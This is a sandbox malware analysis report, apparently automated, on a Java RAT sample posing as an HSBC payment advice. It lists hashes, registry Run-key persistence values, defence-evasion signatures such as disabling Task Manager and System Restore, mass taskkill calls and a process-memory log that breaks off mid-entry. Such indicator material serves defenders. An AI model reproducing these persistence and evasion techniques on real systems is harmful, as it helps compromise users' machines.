Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
25-08-2020 10:27
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice Hsbc_pdf.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Payment Advice Hsbc_pdf.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
Payment Advice Hsbc_pdf.jar
-
Size
411KB
-
MD5
f202f81ea024be0ef950ff369bdf4087
-
SHA1
4dbbfe69123c4d8348e61f06f1b6c78e6e685fca
-
SHA256
0b81ff2995706809c70836bc77057db0e6b395c39f8e4623d354efcaa82f7480
-
SHA512
99eff56986a915ca8ed5d301484e24b82d35745e17bfecf275e38705cb4e95f4a60b06930f2d01157905f843971f01b03613b0c79e92dc78ab269fe499271c54
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x0003000000013512-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1056 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini java.exe File created C:\Users\Admin\ujTBR\Desktop.ini java.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\rdBpT java.exe File opened for modification C:\Windows\System32\rdBpT java.exe -
Kills process with taskkill 19 IoCs
pid Process 108 taskkill.exe 1644 taskkill.exe 1612 taskkill.exe 1852 taskkill.exe 1572 taskkill.exe 1596 taskkill.exe 112 taskkill.exe 1832 taskkill.exe 1840 taskkill.exe 1560 taskkill.exe 1476 taskkill.exe 584 taskkill.exe 1332 taskkill.exe 2020 taskkill.exe 2020 taskkill.exe 376 taskkill.exe 1920 taskkill.exe 1996 taskkill.exe 1084 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1896 powershell.exe 1896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1628 WMIC.exe Token: SeSecurityPrivilege 1628 WMIC.exe Token: SeTakeOwnershipPrivilege 1628 WMIC.exe Token: SeLoadDriverPrivilege 1628 WMIC.exe Token: SeSystemProfilePrivilege 1628 WMIC.exe Token: SeSystemtimePrivilege 1628 WMIC.exe Token: SeProfSingleProcessPrivilege 1628 WMIC.exe Token: SeIncBasePriorityPrivilege 1628 WMIC.exe Token: SeCreatePagefilePrivilege 1628 WMIC.exe Token: SeBackupPrivilege 1628 WMIC.exe Token: SeRestorePrivilege 1628 WMIC.exe Token: SeShutdownPrivilege 1628 WMIC.exe Token: SeDebugPrivilege 1628 WMIC.exe Token: SeSystemEnvironmentPrivilege 1628 WMIC.exe Token: SeRemoteShutdownPrivilege 1628 WMIC.exe Token: SeUndockPrivilege 1628 WMIC.exe Token: SeManageVolumePrivilege 1628 WMIC.exe Token: 33 1628 WMIC.exe Token: 34 1628 WMIC.exe Token: 35 1628 WMIC.exe Token: SeIncreaseQuotaPrivilege 1628 WMIC.exe Token: SeSecurityPrivilege 1628 WMIC.exe Token: SeTakeOwnershipPrivilege 1628 WMIC.exe Token: SeLoadDriverPrivilege 1628 WMIC.exe Token: SeSystemProfilePrivilege 1628 WMIC.exe Token: SeSystemtimePrivilege 1628 WMIC.exe Token: SeProfSingleProcessPrivilege 1628 WMIC.exe Token: SeIncBasePriorityPrivilege 1628 WMIC.exe Token: SeCreatePagefilePrivilege 1628 WMIC.exe Token: SeBackupPrivilege 1628 WMIC.exe Token: SeRestorePrivilege 1628 WMIC.exe Token: SeShutdownPrivilege 1628 WMIC.exe Token: SeDebugPrivilege 1628 WMIC.exe Token: SeSystemEnvironmentPrivilege 1628 WMIC.exe Token: SeRemoteShutdownPrivilege 1628 WMIC.exe Token: SeUndockPrivilege 1628 WMIC.exe Token: SeManageVolumePrivilege 1628 WMIC.exe Token: 33 1628 WMIC.exe Token: 34 1628 WMIC.exe Token: 35 1628 WMIC.exe Token: SeIncreaseQuotaPrivilege 1112 WMIC.exe Token: SeSecurityPrivilege 1112 WMIC.exe Token: SeTakeOwnershipPrivilege 1112 WMIC.exe Token: SeLoadDriverPrivilege 1112 WMIC.exe Token: SeSystemProfilePrivilege 1112 WMIC.exe Token: SeSystemtimePrivilege 1112 WMIC.exe Token: SeProfSingleProcessPrivilege 1112 WMIC.exe Token: SeIncBasePriorityPrivilege 1112 WMIC.exe Token: SeCreatePagefilePrivilege 1112 WMIC.exe Token: SeBackupPrivilege 1112 WMIC.exe Token: SeRestorePrivilege 1112 WMIC.exe Token: SeShutdownPrivilege 1112 WMIC.exe Token: SeDebugPrivilege 1112 WMIC.exe Token: SeSystemEnvironmentPrivilege 1112 WMIC.exe Token: SeRemoteShutdownPrivilege 1112 WMIC.exe Token: SeUndockPrivilege 1112 WMIC.exe Token: SeManageVolumePrivilege 1112 WMIC.exe Token: 33 1112 WMIC.exe Token: 34 1112 WMIC.exe Token: 35 1112 WMIC.exe Token: SeIncreaseQuotaPrivilege 1112 WMIC.exe Token: SeSecurityPrivilege 1112 WMIC.exe Token: SeTakeOwnershipPrivilege 1112 WMIC.exe Token: SeLoadDriverPrivilege 1112 WMIC.exe Token: SeSystemProfilePrivilege 1112 WMIC.exe Token: SeSystemtimePrivilege 1112 WMIC.exe Token: SeProfSingleProcessPrivilege 1112 WMIC.exe Token: SeIncBasePriorityPrivilege 1112 WMIC.exe Token: SeCreatePagefilePrivilege 1112 WMIC.exe Token: SeBackupPrivilege 1112 WMIC.exe Token: SeRestorePrivilege 1112 WMIC.exe Token: SeShutdownPrivilege 1112 WMIC.exe Token: SeDebugPrivilege 1112 WMIC.exe Token: SeSystemEnvironmentPrivilege 1112 WMIC.exe Token: SeRemoteShutdownPrivilege 1112 WMIC.exe Token: SeUndockPrivilege 1112 WMIC.exe Token: SeManageVolumePrivilege 1112 WMIC.exe Token: 33 1112 WMIC.exe Token: 34 1112 WMIC.exe Token: 35 1112 WMIC.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 584 taskkill.exe Token: SeDebugPrivilege 112 taskkill.exe Token: SeDebugPrivilege 1896 powershell.exe Token: SeDebugPrivilege 108 taskkill.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe Token: SeDebugPrivilege 1852 taskkill.exe Token: SeDebugPrivilege 1332 taskkill.exe Token: SeDebugPrivilege 1084 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 1572 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 376 taskkill.exe Token: SeDebugPrivilege 1596 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1056 java.exe -
Suspicious use of WriteProcessMemory 798 IoCs
description pid Process procid_target PID 1056 wrote to memory of 108 1056 java.exe 25 PID 1056 wrote to memory of 108 1056 java.exe 25 PID 1056 wrote to memory of 108 1056 java.exe 25 PID 1056 wrote to memory of 908 1056 java.exe 26 PID 1056 wrote to memory of 908 1056 java.exe 26 PID 1056 wrote to memory of 908 1056 java.exe 26 PID 908 wrote to memory of 1628 908 cmd.exe 27 PID 908 wrote to memory of 1628 908 cmd.exe 27 PID 908 wrote to memory of 1628 908 cmd.exe 27 PID 1056 wrote to memory of 1120 1056 java.exe 28 PID 1056 wrote to memory of 1120 1056 java.exe 28 PID 1056 wrote to memory of 1120 1056 java.exe 28 PID 1120 wrote to memory of 1112 1120 cmd.exe 29 PID 1120 wrote to memory of 1112 1120 cmd.exe 29 PID 1120 wrote to memory of 1112 1120 cmd.exe 29 PID 1056 wrote to memory of 1716 1056 java.exe 30 PID 1056 wrote to memory of 1716 1056 java.exe 30 PID 1056 wrote to memory of 1716 1056 java.exe 30 PID 1056 wrote to memory of 1820 1056 java.exe 31 PID 1056 wrote to memory of 1820 1056 java.exe 31 PID 1056 wrote to memory of 1820 1056 java.exe 31 PID 1056 wrote to memory of 1268 1056 java.exe 32 PID 1056 wrote to memory of 1268 1056 java.exe 32 PID 1056 wrote to memory of 1268 1056 java.exe 32 PID 1056 wrote to memory of 1832 1056 java.exe 33 PID 1056 wrote to memory of 1832 1056 java.exe 33 PID 1056 wrote to memory of 1832 1056 java.exe 33 PID 1056 wrote to memory of 1784 1056 java.exe 34 PID 1056 wrote to memory of 1784 1056 java.exe 34 PID 1056 wrote to memory of 1784 1056 java.exe 34 PID 1056 wrote to memory of 1776 1056 java.exe 35 PID 1056 wrote to memory of 1776 1056 java.exe 35 PID 1056 wrote to memory of 1776 1056 java.exe 35 PID 1056 wrote to memory of 1664 1056 java.exe 36 PID 1056 wrote to memory of 1664 1056 java.exe 36 PID 1056 wrote to memory of 1664 1056 java.exe 36 PID 1056 wrote to memory of 1652 1056 java.exe 37 PID 1056 wrote to memory of 1652 1056 java.exe 37 PID 1056 wrote to memory of 1652 1056 java.exe 37 PID 1056 wrote to memory of 1572 1056 java.exe 38 PID 1056 wrote to memory of 1572 1056 java.exe 38 PID 1056 wrote to memory of 1572 1056 java.exe 38 PID 1056 wrote to memory of 1896 1056 java.exe 39 PID 1056 wrote to memory of 1896 1056 java.exe 39 PID 1056 wrote to memory of 1896 1056 java.exe 39 PID 1056 wrote to memory of 1860 1056 java.exe 40 PID 1056 wrote to memory of 1860 1056 java.exe 40 PID 1056 wrote to memory of 1860 1056 java.exe 40 PID 1056 wrote to memory of 1864 1056 java.exe 41 PID 1056 wrote to memory of 1864 1056 java.exe 41 PID 1056 wrote to memory of 1864 1056 java.exe 41 PID 1056 wrote to memory of 1920 1056 java.exe 42 PID 1056 wrote to memory of 1920 1056 java.exe 42 PID 1056 wrote to memory of 1920 1056 java.exe 42 PID 1056 wrote to memory of 1944 1056 java.exe 44 PID 1056 wrote to memory of 1944 1056 java.exe 44 PID 1056 wrote to memory of 1944 1056 java.exe 44 PID 1572 wrote to memory of 1908 1572 cmd.exe 46 PID 1572 wrote to memory of 1908 1572 cmd.exe 46 PID 1572 wrote to memory of 1908 1572 cmd.exe 46 PID 1056 wrote to memory of 1984 1056 java.exe 47 PID 1056 wrote to memory of 1984 1056 java.exe 47 PID 1056 wrote to memory of 1984 1056 java.exe 47 PID 1056 wrote to memory of 2036 1056 java.exe 48 PID 1056 wrote to memory of 2036 1056 java.exe 48 PID 1056 wrote to memory of 2036 1056 java.exe 48 PID 1056 wrote to memory of 2028 1056 java.exe 49 PID 1056 wrote to memory of 2028 1056 java.exe 49 PID 1056 wrote to memory of 2028 1056 java.exe 49 PID 1056 wrote to memory of 376 1056 java.exe 50 PID 1056 wrote to memory of 376 1056 java.exe 50 PID 1056 wrote to memory of 376 1056 java.exe 50 PID 1056 wrote to memory of 576 1056 java.exe 51 PID 1056 wrote to memory of 576 1056 java.exe 51 PID 1056 wrote to memory of 576 1056 java.exe 51 PID 1056 wrote to memory of 760 1056 java.exe 52 PID 1056 wrote to memory of 760 1056 java.exe 52 PID 1056 wrote to memory of 760 1056 java.exe 52 PID 1056 wrote to memory of 2004 1056 java.exe 53 PID 1056 wrote to memory of 2004 1056 java.exe 53 PID 1056 wrote to memory of 2004 1056 java.exe 53 PID 1056 wrote to memory of 1136 1056 java.exe 55 PID 1056 wrote to memory of 1136 1056 java.exe 55 PID 1056 wrote to memory of 1136 1056 java.exe 55 PID 1056 wrote to memory of 1500 1056 java.exe 56 PID 1056 wrote to memory of 1500 1056 java.exe 56 PID 1056 wrote to memory of 1500 1056 java.exe 56 PID 1056 wrote to memory of 860 1056 java.exe 57 PID 1056 wrote to memory of 860 1056 java.exe 57 PID 1056 wrote to memory of 860 1056 java.exe 57 PID 1056 wrote to memory of 1076 1056 java.exe 58 PID 1056 wrote to memory of 1076 1056 java.exe 58 PID 1056 wrote to memory of 1076 1056 java.exe 58 PID 1056 wrote to memory of 112 1056 java.exe 62 PID 1056 wrote to memory of 112 1056 java.exe 62 PID 1056 wrote to memory of 112 1056 java.exe 62 PID 1056 wrote to memory of 1060 1056 java.exe 63 PID 1056 wrote to memory of 1060 1056 java.exe 63 PID 1056 wrote to memory of 1060 1056 java.exe 63 PID 1056 wrote to memory of 1100 1056 java.exe 65 PID 1056 wrote to memory of 1100 1056 java.exe 65 PID 1056 wrote to memory of 1100 1056 java.exe 65 PID 1056 wrote to memory of 1520 1056 java.exe 66 PID 1056 wrote to memory of 1520 1056 java.exe 66 PID 1056 wrote to memory of 1520 1056 java.exe 66 PID 1056 wrote to memory of 772 1056 java.exe 69 PID 1056 wrote to memory of 772 1056 java.exe 69 PID 1056 wrote to memory of 772 1056 java.exe 69 PID 1056 wrote to memory of 1380 1056 java.exe 70 PID 1056 wrote to memory of 1380 1056 java.exe 70 PID 1056 wrote to memory of 1380 1056 java.exe 70 PID 1056 wrote to memory of 1800 1056 java.exe 72 PID 1056 wrote to memory of 1800 1056 java.exe 72 PID 1056 wrote to memory of 1800 1056 java.exe 72 PID 1056 wrote to memory of 1796 1056 java.exe 73 PID 1056 wrote to memory of 1796 1056 java.exe 73 PID 1056 wrote to memory of 1796 1056 java.exe 73 PID 1056 wrote to memory of 1792 1056 java.exe 74 PID 1056 wrote to memory of 1792 1056 java.exe 74 PID 1056 wrote to memory of 1792 1056 java.exe 74 PID 1056 wrote to memory of 1592 1056 java.exe 75 PID 1056 wrote to memory of 1592 1056 java.exe 75 PID 1056 wrote to memory of 1592 1056 java.exe 75 PID 1056 wrote to memory of 1568 1056 java.exe 86 PID 1056 wrote to memory of 1568 1056 java.exe 86 PID 1056 wrote to memory of 1568 1056 java.exe 86 PID 1056 wrote to memory of 1340 1056 java.exe 87 PID 1056 wrote to memory of 1340 1056 java.exe 87 PID 1056 wrote to memory of 1340 1056 java.exe 87 PID 1056 wrote to memory of 1996 1056 java.exe 88 PID 1056 wrote to memory of 1996 1056 java.exe 88 PID 1056 wrote to memory of 1996 1056 java.exe 88 PID 1056 wrote to memory of 796 1056 java.exe 89 PID 1056 wrote to memory of 796 1056 java.exe 89 PID 1056 wrote to memory of 796 1056 java.exe 89 PID 1056 wrote to memory of 1812 1056 java.exe 91 PID 1056 wrote to memory of 1812 1056 java.exe 91 PID 1056 wrote to memory of 1812 1056 java.exe 91 PID 1056 wrote to memory of 536 1056 java.exe 92 PID 1056 wrote to memory of 536 1056 java.exe 92 PID 1056 wrote to memory of 536 1056 java.exe 92 PID 1056 wrote to memory of 824 1056 java.exe 93 PID 1056 wrote to memory of 824 1056 java.exe 93 PID 1056 wrote to memory of 824 1056 java.exe 93 PID 1056 wrote to memory of 1268 1056 java.exe 94 PID 1056 wrote to memory of 1268 1056 java.exe 94 PID 1056 wrote to memory of 1268 1056 java.exe 94 PID 1056 wrote to memory of 1608 1056 java.exe 96 PID 1056 wrote to memory of 1608 1056 java.exe 96 PID 1056 wrote to memory of 1608 1056 java.exe 96 PID 1572 wrote to memory of 1972 1572 cmd.exe 111 PID 1572 wrote to memory of 1972 1572 cmd.exe 111 PID 1572 wrote to memory of 1972 1572 cmd.exe 111 PID 1056 wrote to memory of 1060 1056 java.exe 112 PID 1056 wrote to memory of 1060 1056 java.exe 112 PID 1056 wrote to memory of 1060 1056 java.exe 112 PID 1060 wrote to memory of 624 1060 cmd.exe 113 PID 1060 wrote to memory of 624 1060 cmd.exe 113 PID 1060 wrote to memory of 624 1060 cmd.exe 113 PID 1060 wrote to memory of 1084 1060 cmd.exe 114 PID 1060 wrote to memory of 1084 1060 cmd.exe 114 PID 1060 wrote to memory of 1084 1060 cmd.exe 114 PID 1056 wrote to memory of 660 1056 java.exe 115 PID 1056 wrote to memory of 660 1056 java.exe 115 PID 1056 wrote to memory of 660 1056 java.exe 115 PID 660 wrote to memory of 1928 660 cmd.exe 116 PID 660 wrote to memory of 1928 660 cmd.exe 116 PID 660 wrote to memory of 1928 660 cmd.exe 116 PID 660 wrote to memory of 1380 660 cmd.exe 117 PID 660 wrote to memory of 1380 660 cmd.exe 117 PID 660 wrote to memory of 1380 660 cmd.exe 117 PID 1056 wrote to memory of 2000 1056 java.exe 118 PID 1056 wrote to memory of 2000 1056 java.exe 118 PID 1056 wrote to memory of 2000 1056 java.exe 118 PID 2000 wrote to memory of 1488 2000 cmd.exe 119 PID 2000 wrote to memory of 1488 2000 cmd.exe 119 PID 2000 wrote to memory of 1488 2000 cmd.exe 119 PID 1056 wrote to memory of 584 1056 java.exe 120 PID 1056 wrote to memory of 584 1056 java.exe 120 PID 1056 wrote to memory of 584 1056 java.exe 120 PID 2000 wrote to memory of 1336 2000 cmd.exe 121 PID 2000 wrote to memory of 1336 2000 cmd.exe 121 PID 2000 wrote to memory of 1336 2000 cmd.exe 121 PID 1056 wrote to memory of 2004 1056 java.exe 123 PID 1056 wrote to memory of 2004 1056 java.exe 123 PID 1056 wrote to memory of 2004 1056 java.exe 123 PID 2004 wrote to memory of 2020 2004 cmd.exe 124 PID 2004 wrote to memory of 2020 2004 cmd.exe 124 PID 2004 wrote to memory of 2020 2004 cmd.exe 124 PID 2004 wrote to memory of 1612 2004 cmd.exe 125 PID 2004 wrote to memory of 1612 2004 cmd.exe 125 PID 2004 wrote to memory of 1612 2004 cmd.exe 125 PID 1056 wrote to memory of 1496 1056 java.exe 126 PID 1056 wrote to memory of 1496 1056 java.exe 126 PID 1056 wrote to memory of 1496 1056 java.exe 126 PID 1496 wrote to memory of 2008 1496 cmd.exe 127 PID 1496 wrote to memory of 2008 1496 cmd.exe 127 PID 1496 wrote to memory of 2008 1496 cmd.exe 127 PID 1496 wrote to memory of 1840 1496 cmd.exe 128 PID 1496 wrote to memory of 1840 1496 cmd.exe 128 PID 1496 wrote to memory of 1840 1496 cmd.exe 128 PID 1056 wrote to memory of 1916 1056 java.exe 129 PID 1056 wrote to memory of 1916 1056 java.exe 129 PID 1056 wrote to memory of 1916 1056 java.exe 129 PID 1916 wrote to memory of 1628 1916 cmd.exe 130 PID 1916 wrote to memory of 1628 1916 cmd.exe 130 PID 1916 wrote to memory of 1628 1916 cmd.exe 130 PID 1916 wrote to memory of 2012 1916 cmd.exe 131 PID 1916 wrote to memory of 2012 1916 cmd.exe 131 PID 1916 wrote to memory of 2012 1916 cmd.exe 131 PID 1056 wrote to memory of 1804 1056 java.exe 132 PID 1056 wrote to memory of 1804 1056 java.exe 132 PID 1056 wrote to memory of 1804 1056 java.exe 132 PID 1804 wrote to memory of 1568 1804 cmd.exe 133 PID 1804 wrote to memory of 1568 1804 cmd.exe 133 PID 1804 wrote to memory of 1568 1804 cmd.exe 133 PID 1804 wrote to memory of 744 1804 cmd.exe 134 PID 1804 wrote to memory of 744 1804 cmd.exe 134 PID 1804 wrote to memory of 744 1804 cmd.exe 134 PID 1056 wrote to memory of 1716 1056 java.exe 135 PID 1056 wrote to memory of 1716 1056 java.exe 135 PID 1056 wrote to memory of 1716 1056 java.exe 135 PID 1716 wrote to memory of 1268 1716 cmd.exe 136 PID 1716 wrote to memory of 1268 1716 cmd.exe 136 PID 1716 wrote to memory of 1268 1716 cmd.exe 136 PID 1716 wrote to memory of 1264 1716 cmd.exe 137 PID 1716 wrote to memory of 1264 1716 cmd.exe 137 PID 1716 wrote to memory of 1264 1716 cmd.exe 137 PID 1056 wrote to memory of 1368 1056 java.exe 138 PID 1056 wrote to memory of 1368 1056 java.exe 138 PID 1056 wrote to memory of 1368 1056 java.exe 138 PID 1368 wrote to memory of 576 1368 cmd.exe 139 PID 1368 wrote to memory of 576 1368 cmd.exe 139 PID 1368 wrote to memory of 576 1368 cmd.exe 139 PID 1368 wrote to memory of 1864 1368 cmd.exe 140 PID 1368 wrote to memory of 1864 1368 cmd.exe 140 PID 1368 wrote to memory of 1864 1368 cmd.exe 140 PID 1056 wrote to memory of 1036 1056 java.exe 141 PID 1056 wrote to memory of 1036 1056 java.exe 141 PID 1056 wrote to memory of 1036 1056 java.exe 141 PID 1056 wrote to memory of 112 1056 java.exe 142 PID 1056 wrote to memory of 112 1056 java.exe 142 PID 1056 wrote to memory of 112 1056 java.exe 142 PID 1036 wrote to memory of 1988 1036 cmd.exe 143 PID 1036 wrote to memory of 1988 1036 cmd.exe 143 PID 1036 wrote to memory of 1988 1036 cmd.exe 143 PID 1036 wrote to memory of 1944 1036 cmd.exe 145 PID 1036 wrote to memory of 1944 1036 cmd.exe 145 PID 1036 wrote to memory of 1944 1036 cmd.exe 145 PID 1056 wrote to memory of 2044 1056 java.exe 146 PID 1056 wrote to memory of 2044 1056 java.exe 146 PID 1056 wrote to memory of 2044 1056 java.exe 146 PID 2044 wrote to memory of 2036 2044 cmd.exe 147 PID 2044 wrote to memory of 2036 2044 cmd.exe 147 PID 2044 wrote to memory of 2036 2044 cmd.exe 147 PID 2044 wrote to memory of 2024 2044 cmd.exe 148 PID 2044 wrote to memory of 2024 2044 cmd.exe 148 PID 2044 wrote to memory of 2024 2044 cmd.exe 148 PID 1056 wrote to memory of 240 1056 java.exe 149 PID 1056 wrote to memory of 240 1056 java.exe 149 PID 1056 wrote to memory of 240 1056 java.exe 149 PID 240 wrote to memory of 1216 240 cmd.exe 150 PID 240 wrote to memory of 1216 240 cmd.exe 150 PID 240 wrote to memory of 1216 240 cmd.exe 150 PID 240 wrote to memory of 1996 240 cmd.exe 151 PID 240 wrote to memory of 1996 240 cmd.exe 151 PID 240 wrote to memory of 1996 240 cmd.exe 151 PID 1056 wrote to memory of 1848 1056 java.exe 152 PID 1056 wrote to memory of 1848 1056 java.exe 152 PID 1056 wrote to memory of 1848 1056 java.exe 152 PID 1848 wrote to memory of 1928 1848 cmd.exe 153 PID 1848 wrote to memory of 1928 1848 cmd.exe 153 PID 1848 wrote to memory of 1928 1848 cmd.exe 153 PID 1848 wrote to memory of 1656 1848 cmd.exe 154 PID 1848 wrote to memory of 1656 1848 cmd.exe 154 PID 1848 wrote to memory of 1656 1848 cmd.exe 154 PID 1056 wrote to memory of 1100 1056 java.exe 155 PID 1056 wrote to memory of 1100 1056 java.exe 155 PID 1056 wrote to memory of 1100 1056 java.exe 155 PID 1100 wrote to memory of 748 1100 cmd.exe 156 PID 1100 wrote to memory of 748 1100 cmd.exe 156 PID 1100 wrote to memory of 748 1100 cmd.exe 156 PID 1100 wrote to memory of 1952 1100 cmd.exe 157 PID 1100 wrote to memory of 1952 1100 cmd.exe 157 PID 1100 wrote to memory of 1952 1100 cmd.exe 157 PID 1056 wrote to memory of 1592 1056 java.exe 158 PID 1056 wrote to memory of 1592 1056 java.exe 158 PID 1056 wrote to memory of 1592 1056 java.exe 158 PID 1592 wrote to memory of 2020 1592 cmd.exe 159 PID 1592 wrote to memory of 2020 1592 cmd.exe 159 PID 1592 wrote to memory of 2020 1592 cmd.exe 159 PID 1592 wrote to memory of 2008 1592 cmd.exe 160 PID 1592 wrote to memory of 2008 1592 cmd.exe 160 PID 1592 wrote to memory of 2008 1592 cmd.exe 160 PID 1056 wrote to memory of 108 1056 java.exe 161 PID 1056 wrote to memory of 108 1056 java.exe 161 PID 1056 wrote to memory of 108 1056 java.exe 161 PID 1056 wrote to memory of 1908 1056 java.exe 163 PID 1056 wrote to memory of 1908 1056 java.exe 163 PID 1056 wrote to memory of 1908 1056 java.exe 163 PID 1908 wrote to memory of 552 1908 cmd.exe 164 PID 1908 wrote to memory of 552 1908 cmd.exe 164 PID 1908 wrote to memory of 552 1908 cmd.exe 164 PID 1908 wrote to memory of 892 1908 cmd.exe 165 PID 1908 wrote to memory of 892 1908 cmd.exe 165 PID 1908 wrote to memory of 892 1908 cmd.exe 165 PID 1056 wrote to memory of 1332 1056 java.exe 166 PID 1056 wrote to memory of 1332 1056 java.exe 166 PID 1056 wrote to memory of 1332 1056 java.exe 166 PID 1332 wrote to memory of 744 1332 cmd.exe 167 PID 1332 wrote to memory of 744 1332 cmd.exe 167 PID 1332 wrote to memory of 744 1332 cmd.exe 167 PID 1332 wrote to memory of 536 1332 cmd.exe 168 PID 1332 wrote to memory of 536 1332 cmd.exe 168 PID 1332 wrote to memory of 536 1332 cmd.exe 168 PID 1056 wrote to memory of 1264 1056 java.exe 169 PID 1056 wrote to memory of 1264 1056 java.exe 169 PID 1056 wrote to memory of 1264 1056 java.exe 169 PID 1264 wrote to memory of 1912 1264 cmd.exe 170 PID 1264 wrote to memory of 1912 1264 cmd.exe 170 PID 1264 wrote to memory of 1912 1264 cmd.exe 170 PID 1056 wrote to memory of 1644 1056 java.exe 171 PID 1056 wrote to memory of 1644 1056 java.exe 171 PID 1056 wrote to memory of 1644 1056 java.exe 171 PID 1264 wrote to memory of 2040 1264 cmd.exe 173 PID 1264 wrote to memory of 2040 1264 cmd.exe 173 PID 1264 wrote to memory of 2040 1264 cmd.exe 173 PID 1056 wrote to memory of 2024 1056 java.exe 174 PID 1056 wrote to memory of 2024 1056 java.exe 174 PID 1056 wrote to memory of 2024 1056 java.exe 174 PID 2024 wrote to memory of 1008 2024 cmd.exe 175 PID 2024 wrote to memory of 1008 2024 cmd.exe 175 PID 2024 wrote to memory of 1008 2024 cmd.exe 175 PID 2024 wrote to memory of 1968 2024 cmd.exe 176 PID 2024 wrote to memory of 1968 2024 cmd.exe 176 PID 2024 wrote to memory of 1968 2024 cmd.exe 176 PID 1056 wrote to memory of 860 1056 java.exe 177 PID 1056 wrote to memory of 860 1056 java.exe 177 PID 1056 wrote to memory of 860 1056 java.exe 177 PID 860 wrote to memory of 1860 860 cmd.exe 178 PID 860 wrote to memory of 1860 860 cmd.exe 178 PID 860 wrote to memory of 1860 860 cmd.exe 178 PID 860 wrote to memory of 112 860 cmd.exe 179 PID 860 wrote to memory of 112 860 cmd.exe 179 PID 860 wrote to memory of 112 860 cmd.exe 179 PID 1056 wrote to memory of 1380 1056 java.exe 180 PID 1056 wrote to memory of 1380 1056 java.exe 180 PID 1056 wrote to memory of 1380 1056 java.exe 180 PID 1380 wrote to memory of 1796 1380 cmd.exe 181 PID 1380 wrote to memory of 1796 1380 cmd.exe 181 PID 1380 wrote to memory of 1796 1380 cmd.exe 181 PID 1380 wrote to memory of 1336 1380 cmd.exe 182 PID 1380 wrote to memory of 1336 1380 cmd.exe 182 PID 1380 wrote to memory of 1336 1380 cmd.exe 182 PID 1056 wrote to memory of 748 1056 java.exe 183 PID 1056 wrote to memory of 748 1056 java.exe 183 PID 1056 wrote to memory of 748 1056 java.exe 183 PID 1056 wrote to memory of 1612 1056 java.exe 184 PID 1056 wrote to memory of 1612 1056 java.exe 184 PID 1056 wrote to memory of 1612 1056 java.exe 184 PID 748 wrote to memory of 1624 748 cmd.exe 185 PID 748 wrote to memory of 1624 748 cmd.exe 185 PID 748 wrote to memory of 1624 748 cmd.exe 185 PID 748 wrote to memory of 684 748 cmd.exe 186 PID 748 wrote to memory of 684 748 cmd.exe 186 PID 748 wrote to memory of 684 748 cmd.exe 186 PID 1056 wrote to memory of 1368 1056 java.exe 188 PID 1056 wrote to memory of 1368 1056 java.exe 188 PID 1056 wrote to memory of 1368 1056 java.exe 188 PID 1368 wrote to memory of 1520 1368 cmd.exe 189 PID 1368 wrote to memory of 1520 1368 cmd.exe 189 PID 1368 wrote to memory of 1520 1368 cmd.exe 189 PID 1368 wrote to memory of 1572 1368 cmd.exe 190 PID 1368 wrote to memory of 1572 1368 cmd.exe 190 PID 1368 wrote to memory of 1572 1368 cmd.exe 190 PID 1056 wrote to memory of 1812 1056 java.exe 191 PID 1056 wrote to memory of 1812 1056 java.exe 191 PID 1056 wrote to memory of 1812 1056 java.exe 191 PID 1812 wrote to memory of 660 1812 cmd.exe 192 PID 1812 wrote to memory of 660 1812 cmd.exe 192 PID 1812 wrote to memory of 660 1812 cmd.exe 192 PID 1812 wrote to memory of 1804 1812 cmd.exe 193 PID 1812 wrote to memory of 1804 1812 cmd.exe 193 PID 1812 wrote to memory of 1804 1812 cmd.exe 193 PID 1056 wrote to memory of 1112 1056 java.exe 194 PID 1056 wrote to memory of 1112 1056 java.exe 194 PID 1056 wrote to memory of 1112 1056 java.exe 194 PID 1112 wrote to memory of 1840 1112 cmd.exe 195 PID 1112 wrote to memory of 1840 1112 cmd.exe 195 PID 1112 wrote to memory of 1840 1112 cmd.exe 195 PID 1112 wrote to memory of 1640 1112 cmd.exe 196 PID 1112 wrote to memory of 1640 1112 cmd.exe 196 PID 1112 wrote to memory of 1640 1112 cmd.exe 196 PID 1056 wrote to memory of 1664 1056 java.exe 197 PID 1056 